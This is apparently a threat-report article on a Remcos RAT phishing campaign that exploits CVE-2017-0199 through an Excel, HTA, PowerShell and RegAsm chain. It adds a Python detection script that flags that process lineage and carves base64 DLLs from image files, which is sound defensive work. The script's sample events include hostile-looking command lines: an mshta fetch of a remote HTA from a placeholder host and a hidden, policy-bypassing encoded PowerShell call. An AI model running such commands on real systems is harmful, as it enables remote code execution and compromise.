A newly observed malware campaign uses a phishing email to distribute a seemingly harmless Excel file that exploits CVE-2017-0199, a vulnerability in Microsoft Office that lets attackers embed malicious code through OLE objects.
The attackers use encryption and obfuscation to conceal the malicious payload inside the file. When the victim opens it, the system executes a fileless variant of the Remcos Remote Access Trojan (RAT), giving the attackers remote access to and control over the compromised machine.
In this campaign, the Remcos RAT is delivered through a phishing email carrying an encrypted Excel file that exploits CVE-2017-0199. The attack chain consists of OLE object exploitation, execution of an HTA application, and PowerShell commands that inject the RAT into a legitimate process. The same vulnerability has previously been exploited by other malware families, including LATENTBOT, FINSPY, and WingBird/FinFisher.
Campaigns observed in 2024 have deployed a range of malware, including RevengeRAT, SnakeKeylogger, GuLoader, AgentTesla, and FormBook, against the Government, Manufacturing, Technology/IT, and Banking sectors, primarily in Belgium, Japan, the United States, South Korea, Canada, Germany, and Australia. These campaigns rely on spearphishing to lure victims into opening deceptive Excel documents; the documents exploit CVE-2017-0199 to execute embedded OLE objects that contain malicious URLs, ultimately compromising the victim's system.
The Excel file exploits CVE-2017-0199 to deliver a malicious HTA application. The HTA launches a PowerShell script that downloads and runs a VBScript from a remote URL, which in turn starts a chain of PowerShell processes that escalate the attack and finally download a JPEG file containing a base64-encoded 'dnlib.dll' library for the next stage.
In that next stage, PowerShell downloads a base64-encoded text file from a malicious URL and uses 'dnlib.dll' to turn it into a .NET assembly of the Remcos RAT. The RAT is then injected into the legitimate 'RegAsm' process and maintains persistence by injecting itself into other legitimate processes, evading traditional security defenses.
Indicators of a Remcos RAT infection include its keylogger file and the associated Indicators of Compromise (IOCs). The observed behaviour maps to the MITRE ATT&CK techniques T1055.001, T1027, T1543.003, and T1071.001.
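The process chain and payload staging described in the preceding paragraphs (Excel to HTA to PowerShell to RegAsm, plus a base64-encoded DLL hidden in an image file) are both things a defender can look for in endpoint telemetry. The script below is an added detection example written for this article; it is not code from the original report or from any vendor. It runs over a constructed set of Sysmon-style process-creation events (field names and values are assumptions, and example.invalid is a placeholder, not a real campaign URL), flags any RegAsm process whose ancestry matches the reported chain, tags the chain with the ATT&CK IDs the report lists where the evidence for them is visible in the command lines, and carves a base64-encoded PE image out of a constructed stand-in for the JPEG carrier.

```python
"""Detect the reported Excel -> mshta -> PowerShell -> RegAsm chain and
base64-encoded PE payloads hidden in an image file.

Added detection example; the events and the image blob are constructed,
not captured from the campaign described in the article."""
import base64
import binascii
import ntpath
import re

# Constructed process-creation events (Sysmon-style fields, assumed), oldest first.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\u\Downloads\invoice.xlsx'},
    {"pid": 4180, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/payload.hta"},  # placeholder URL
    {"pid": 4220, "ppid": 4180, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"pid": 4300, "ppid": 4220, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": "RegAsm.exe"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

# Parent -> child sequence from the report, matched as an ordered subsequence
# so an intermediate cmd.exe or conhost.exe does not hide it.
KILL_CHAIN = ["excel.exe", "mshta.exe", "powershell.exe", "regasm.exe"]


def basename(image):
    return ntpath.basename(image).lower()


def lineage(pid, by_pid):
    """Events from the oldest known ancestor down to pid (cycle-safe)."""
    events, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        events.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return events[::-1]


def is_subsequence(pattern, seq):
    it = iter(seq)
    return all(any(p == s for s in it) for p in pattern)


def technique_tags(events):
    """Tag the chain with the ATT&CK IDs the report lists, where visible."""
    tags = set()
    names = [basename(e["image"]) for e in events]
    for i, (e, name) in enumerate(zip(events, names)):
        cmd = " " + e["cmdline"].lower() + " "
        if name == "mshta.exe" and re.search(r"https?://", cmd):
            tags.add("T1071.001")  # HTA fetched over a web protocol
        if name == "powershell.exe" and re.search(r"\s-e(nc(odedcommand)?)?\s", cmd):
            tags.add("T1027")  # base64-encoded command line
        if name == "regasm.exe" and i > 0 and names[i - 1] == "powershell.exe":
            tags.add("T1055.001")  # RegAsm spawned by PowerShell as the injection host
    return sorted(tags)


def suspicious_chains(events):
    """Return every RegAsm process whose ancestry matches KILL_CHAIN."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != KILL_CHAIN[-1]:
            continue
        lin = lineage(e["pid"], by_pid)
        names = [basename(x["image"]) for x in lin]
        if is_subsequence(KILL_CHAIN, names):
            hits.append({"pid": e["pid"], "chain": names, "techniques": technique_tags(lin)})
    return hits


B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def extract_base64_pe(blob):
    """Return the first base64-decoded PE image hidden in blob, or None."""
    for m in B64_RUN.finditer(blob):
        run = m.group(0)
        run += b"=" * (-len(run) % 4)  # tolerate stripped padding
        try:
            data = base64.b64decode(run)
        except (binascii.Error, ValueError):
            continue
        if data.startswith(b"MZ") and b"PE\x00\x00" in data:
            return data
    return None


# Constructed stand-in for the "JPEG" carrier: a JFIF header wrapped around a
# base64 blob whose decoded bytes carry the MZ/PE markers of a DLL.
_FAKE_DLL = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 28
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + base64.b64encode(_FAKE_DLL) + b"\xff\xd9"

if __name__ == "__main__":
    for hit in suspicious_chains(SAMPLE_EVENTS):
        print(f"pid {hit['pid']}: {' -> '.join(hit['chain'])}  {hit['techniques']}")
    pe = extract_base64_pe(SAMPLE_IMAGE)
    print("embedded PE bytes:", 0 if pe is None else len(pe))
```

Matching the chain as a subsequence rather than as direct parent-child pairs keeps the rule stable when the attacker inserts an extra shell, and carving base64 runs by the decoded MZ/PE markers rather than by file extension is what catches a DLL smuggled inside a file that a gateway still classifies as an image.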
In summary, the attackers behind this campaign combine several techniques to build a persistent threat around CVE-2017-0199 in Microsoft Office, using a series of tools and scripts to maintain persistence on the infected system and potentially exfiltrate sensitive data. Organizations and individuals are advised to stay vigilant and deploy robust security measures to defend against threats of this kind.
